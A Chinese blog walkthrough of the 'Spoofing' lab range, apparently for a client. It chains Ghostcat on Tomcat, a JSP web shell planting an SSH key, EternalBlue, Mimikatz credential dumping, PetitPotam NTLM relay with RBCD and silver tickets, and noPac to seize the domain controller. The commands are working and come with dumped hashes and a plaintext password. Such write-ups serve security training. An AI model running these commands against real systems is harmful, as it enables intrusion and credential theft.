前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >春秋云镜-Spoofing

春秋云镜-Spoofing

作者头像
用户2700375
发布于 2023-05-09 02:27:59
发布于 2023-05-09 02:27:59
1.5K03
代码可运行
举报
文章被收录于专栏:很菜的web狗很菜的web狗
运行总次数:3
代码可运行

工作期间某天项目经理找到,需要给客户录一个靶场的WP要求写详细一些过程,项目经理说云镜难度还是可以的,所以丢了一个Spoofing。但尴尬的是,当时平没有很快完成任务,实在是姿势盲区了(本人太菜了。

web

拿到目标ip 47.92.146.61 nmap扫端口。

我们首先访问8080 发现一个未授权的后台,但是基本没有任何功能

dirsearch进行目录扫描

存在一些目录

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://47.92.146.61:8080/docs/

访问可得知Tomcat 9.0.3 + ajp13

存在

https://github.com/00theway/Ghostcat-CNVD-2020-10487

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python3 ajpShooter.py http://47.92.146.61:8080 8009 /WEB-INF/web.xml read

用此脚本读取/WEB-INF/web.xml 进行漏洞验证。

利用成功。并且内容中的 url-pattern 路径我们可以挨个访问一下

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://47.92.146.61:8080/UploadServlet

发现一处上传点(dirsearch是没有直接扫到的,可以加入到自己的字典中)

注意这里由于靶机问题重启 靶机ip从 47.92.146.61 变为了 39.98.183.3

由于上面扫描我们发现开了22端口

首先本机生成一对公私钥,并如下构造 大致内容就是将公钥写到 /root/.ssh/authorized_keys下面

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjE5yG8ayo88aGqr9oNOa4sfLHRL+gPW+BRQUJiiXymM9P1Pu46xc+ITjXndvFUm/LjKwcmlqSPI7EWIEFwWzxPfNeWpjqJSYb6KkYgf3n+zvvKmX+A6CDZZ4Kl0ABV+8dkYML/Jz5IQql8YdAgKCpHMoiV/bGwVTkCDRhuUXL1TW2m7pwXUw9RWM3i8G8WKnpMfQtsYXIo0Qatxx0Lxq3bpIEdkSKGTptGyCuvZCouUd5cpUpJJ4yrW8I0Jg9Zqqifsc2iRrwK6zcW7pHkLAkksEZC2DyM78iR5Fl4Z/PKiJHWYhThTFxByVsikp31q2gfATCx1vjmz6tm3AA/BPkrWtJ1xY9izsjlu46LdhTMD1U8BnJUhSuTUd2lAKjp9qKklp15wfdBbDk4SxWa6BNtwo6v1VDIfRkmPMhzU5ynm1OQsOLJKrRJHt0oJfrabD2e6UZ+DUSyA8Ha2E1FJiXbykqa6vV9THb6LltArhhFNikR42cqxUH1Q/qoM8bG00=" >> /root/.ssh/authorized_keys

chmod 600 /root/.ssh/authorized_keys

在进行base64加密

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==

所以我们上传Spoofing.txt文件 内容为

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>");%>

目的是将Spoofing.txt文件代码执行,将我们的公钥写到靶机里面

最终利用漏洞Ghostcat执行此文件

执行成功公钥写入,直接登陆靶机服务器即可

flag01

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
flag{41af3ec9-9043-42bc-9fb6-06d6a5aa5231}

ifconfig得到 当前Ubuntu ip 为 172.22.11.76

Ubuntu 172.22.11.76

接下来我们重点看下内网,利用fscan扫一下看看

将fscan上传到靶机

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
scp -i id_rsa  /Users/sch0lar/Downloads/fscan_386 root@39.98.183.3:/

fscan扫C段

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
./fscan_386 -h 172.22.11.1/24

发现内网中其他三台主机 并且172.22.11.6为域控

172.22.11.6 DC XIAORANG\XIAORANG-DC

172.22.11.26 XIAORANG\XR-LCM3AE8B

172.22.11.45 XIAORANG\XR-DESKTOP

经fscan扫描发现 172.22.11.45 可能存在永恒之蓝漏洞。

机器出网我们进行反向代理

内网成功访问,说明代理成功。msf 17010去打一下172.22.11.45 这台机器

msf设置代理

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
setg Proxies socks5:103.20.221.39:9999
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 172.22.11.45
set lport 1433

注意这里默认的4444会话不能正常建立,经测试使用一些常见端口 1433 3306 80即可

Dump hash

本地凭据

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

msf中加载 kiwi load kiwi creds_all获取域凭据

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
XR-DESKTOP$  XIAORANG  849af87004aedcb12d26d3646e4d1809  6cdc7983267c995623cf242b70869f295a22fccc
yangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841  6b2838f81b57faed5d860adaf9401b0edb269a6f  明文 xrihGHgoNZQ

通过有了 admin和admin hash 可直接psexec 登录

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 psexec.py Administrator@172.22.11.45 -hashes :48f6da83eb89a4da8a1cc963b855a799 -codec gbk

flag02

flag{b326254f-c786-4752-92ce-f511ed7e959d}

把域用户 yangmei加入该机器的本地管理员

确定域控ip为

域渗透

域信息收集

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 -q bloodhound-python -u yangmei -p xrihGHgoNZQ -d xiaorang.lab --dns-tcp -ns 172.22.11.6 -c all --zip

https://github.com/Porchetta-Industries/CrackMapExec

Petitpotam 扫描

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam
  • 无ADCS + Petitpotam + ntlm中继打法攻击链:用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)
  • 满足条件,目标机器需要开启webclient服务
  • WebClient扫描,确定只能拿下 172.22.11.26 (XR-LCM3AE8B)

https://github.com/Hackndo/WebclientServiceScanner

NTLM中继过程中需要使用HTTP协议来完成中继请求和响应,而Webclient服务包含了HTTP协议相关,所以开启 Webclient 服务可以为 NTLM 中继提供必要的功能支持

  • 中继攻击前言:
    • 实战中的中继打法只需要停掉80占用服务,开启端口转发(portfwd,CS在后续版本中添加了rportfwd_local,直接转发到客户端本地)
    • 本次演示类似实战的打法,不选择把impacket丢到入口ubuntu上面这种操作
  • 中继攻击环境配置: 端口转发 + 代理我们目前需要把服务器的80,转发到客户端本地的80
  • 注意:由于SSH的反向端口转发监听的时候只会监听127.0.0.1,所以这时候需要点技巧如图所示,即使反向端口转发79端口指定监听全部 (-R *:79:127.0.0.1:80),端口79依旧绑定在了127.0.0.1(图中顺便把socks5代理也开了)
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ssh -i id_rsa root@47.92.254.136 -D 0.0.0.0:1080 -R \*:79:127.0.0.1:80

加多一条socat,让流量 0.0.0.0:80 转发到 127.0.0.1:79,再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &

简单说也就是当我们访问ubuntu的80端口会被转发到ubuntu的79端口,ubuntu的79端口会转发到我们本机的80端口

  • 本地开启ntlmrelayx
  • 注意:
    • 前面提到,没有ldaps,所以不能使用addcomputer
    • 同时在使用proxychains后,ldap://后面只能接dc的ip
    • 利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 python3 ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

使用Petitpotam触发 XR-LCM3AE8B 认证到172.22.11.76 (ubuntu)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 python3 Petitpotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt 172.22.11.26

可以看到,已经完成RBCD攻击了,接下来就是直接申请XR-LCM3AE8B的银票了

申请XR-LCM3AE8B CIFS票据

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 python3 getST.py -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :849af87004aedcb12d26d3646e4d1809 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6

这里的hash是前面通过172.22.11.45 mimikatz抓取到的

构造银票了我们psexec连接

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
KRB5CCNAME=/Users/sch0lar/sec/impacket/examples/administrator.ccache proxychains4 python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk

flag03

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
flag{7cd97e18-b25b-42f3-8006-f6d0fc2cbd42}

域渗透 – NoPAC

smbclient.py 传 mimikatz

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
KRB5CCNAME=/Users/sch0lar/sec/impacket/examples/administrator.ccache proxychains4 python3 smbclient.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
cd C:\Windows\Temp
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1

nopac,只有zhanghui能成功,zhanghui在MA_Admin组,MA_Admin组对computer 能够创建对象,但是在bloodhound没看到

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
AdFind.exe -b "CN=Computers,DC=xiaorang,DC=lab" nTSecurityDescriptor -sddl+++

需要补这一张图

Bloodhound看不到,主要原因是没把CreateChild采集进json

回到nopac,加上 create-child 参数

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains4 python3 noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -use-ldap -create-child -dc-ip 172.22.11.6

使用nopac申请到的cifs票据登录进入DC,flag04在 C:\users\administrator\flag\flag04.txt

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
export KRB5CCNAME=/Users/sch0lar/sec/noPac/Administrator_xiaorang-dc.xiaorang.lab.ccache 
proxychains4 psexec.py xiaorang.lab/administrator@xiaorang-dc.xiaorang.lab -k -no-pass -dc-ip 172.22.11.6 -target-ip 172.22.11.6 -codec gbk

flag04

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
flag{683570c8-a6dc-45c2-95aa-9e9b171ed400}
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-05-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
3 条评论
热度
最新
学到了学到了
学到了学到了
回复回复点赞举报
太6了
太6了
回复回复点赞举报
学习了
学习了
回复回复点赞举报
推荐阅读
【无痛学Python】Matplotlib数据可视化,看这一篇就够了!
我们都知道数形结合的概念,图形往往可以帮助我们更好地分析数据之间的差异以及它们的趋势,同时数据的可视化基本就是通过图形来实现的。
Skrrapper
2025/06/11
3810
【无痛学Python】Matplotlib数据可视化,看这一篇就够了!
数据可视化之matplotlib绘制正余弦曲线图
在python里面,数据可视化是python的一个亮点。在python里面,数据可视可以达到什么样的效果,这当然与我们使用的库有关。python常常需要导入库,并不断调用方法,就很像一条流数据可视化的库,有很多,很多都可以后续开发,然后我们调用。了解过pyecharts美观的可视化界面 ,将pyecharts和matplotlib相对比一下。
兰舟千帆
2022/07/16
1.9K0
数据可视化之matplotlib绘制正余弦曲线图
深度学习基础之matplotlib,一文搞定各个示例
Matplotlib 是 Python 的绘图库。它可与 NumPy 一起使用 ,Matplotlib也是深度学习的常用绘图库,主要是将训练的成果进行图形化,因为这样更直观,更方便发现训练中的问题,今天来学习下,走起!!
香菜聊游戏
2021/10/19
1.6K0
深度学习基础之matplotlib,一文搞定各个示例
python matplotlib各种绘图类型完整总结
plot([x], y, [fmt], [x2], y2, [fmt2], …, **kwargs)
Twcat_tree
2022/12/05
6.1K0
python matplotlib各种绘图类型完整总结
Matplotlib 绘2D图
Matplotlib 是一个非常简单而又完善的开源绘图库。那么它到底有多简单呢? 基本知识 首先官方文档奉上 下面,我们通过 3 行代码绘制一张简单的折线图。 from matplotlib imp
听城
2018/04/27
2.5K0
Matplotlib 绘2D图
掌握进阶:高级功能、图表定制与地理数据绘制
Matplotlib是一个功能强大的数据可视化库,为数据科学家提供了丰富的工具和功能,可以以直观的方式呈现数据。
一键难忘
2023/12/19
1K0
基于Matplotlib的高级数据可视化技术与实践探索
文章链接:https://cloud.tencent.com/developer/article/2466769
一键难忘
2024/11/21
3970
Python中局部放大图案例
参考链接:Python中 Matplotlib局部放大图的画法_wulishinian的博客-CSDN博客_python 局部放大
汀丶人工智能
2022/12/21
1.1K0
Python中局部放大图案例
带你十分钟快速入门画图神器 Matplotlib
在开始正式介绍 Matplotlib 用法之前,先来简单了解下 Matplotlib。
abs_zero
2018/09/25
1.2K0
带你十分钟快速入门画图神器 Matplotlib
玩转Matplotlib的10个高级技巧
Matplotlib是Python中流行的数据可视化库,仅使用简单的几行代码就可以生成图表。但是默认的方法是生成的图表很简单,如果想增强数据演示的影响和清晰度,可以试试本文总结的10个高级技巧,这些技巧可以将可视化提升到一个新的水平:
deephub
2023/08/30
3350
玩转Matplotlib的10个高级技巧
Python基础(十二) | 还不会python绘图?两万字博文教你Matplotlib库(超详细总结)
https://matplotlib.org/api/_as_gen/matplotlib.pyplot.plot.html#matplotlib.pyplot.plot
timerring
2022/10/08
2.6K0
Python基础(十二) | 还不会python绘图?两万字博文教你Matplotlib库(超详细总结)
Python可视化 | xarray 绘图时序图
xarray 通过对plt.plot()的包装实现对线图的绘制。如前面所述,axes可以用变量进行标记,从而可以传递给底层matlibplot调用。
郭好奇同学
2021/07/30
3.6K0
Python可视化 | xarray 绘图时序图
(七)Python绘图基础:Matplotlib绘图
        除了使用scatter函数之外,还可以使用plot函数后加参数'o'来实现,代码如下所示:
小点点
2022/12/12
2.3K0
(七)Python绘图基础:Matplotlib绘图
Python3快速入门(十六)——Mat
Matplotlib是 Python 2D-绘图领域使用最广泛的套件,可以简易地将数据图形化,并且提供多样化的输出格式。 matplotlib有两个接口,一个是状态机层的接口,通过pyplot模块来进行管理;一个是面向对象的接口,通过pylab模块将所有的功能函数全部导入其单独的命名空间内。
py3study
2020/01/03
1.4K0
【matplotlib】1-使用函数绘制图表
在一个图形输出窗口中,底层是一个Figure实例,通常称之为画布,包含一些可见和不可见的元素。在画布上的就是图形,图形是一些Axes实例,里面几乎包含了matplotlib的组成元素,例如坐标轴、刻度、标签、线和标记等。
程序员小涛
2022/12/05
1.4K0
【matplotlib】1-使用函数绘制图表
python可视化图表(python 显示图片)
它是用来创建 总画布/figure“窗口”的,有figure就可以在上边(或其中一个子网格/subplot上)作图了,(fig:是figure的缩写)。
全栈程序员站长
2022/08/01
9980
python可视化图表(python 显示图片)
python matplotlib函数备忘
matplotlib是python中一个非常好用的画图库,倾向于使用数据画图,设计思路与matlab中的plot相同。
羽翰尘
2019/11/19
1.1K0
Python数据分析Matplotlib
1.2 使用matplotlib.pyplot中的annotate()函数标注文字
荣仔_最靓的仔
2021/02/02
3.7K0
Python数据分析Matplotlib
10分钟入门Matplotlib: 数据可视化介绍&使用教程
“一张图胜过千言万语”,对于数据来说同样地,“一张可视化的图片胜过一张复杂的数据表格或报告”。
deephub
2020/05/09
1.9K0
10分钟入门Matplotlib: 数据可视化介绍&使用教程
一行代码让matplotlib图表变高大上
matplotlib作为Python生态中最流行的数据可视化框架,虽然功能非常强大,但默认样式比较简陋,想要制作具有简洁商务风格的图表往往需要编写众多的代码来调整各种参数。
Feffery
2021/07/27
1K0
相关推荐
【无痛学Python】Matplotlib数据可视化,看这一篇就够了!
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档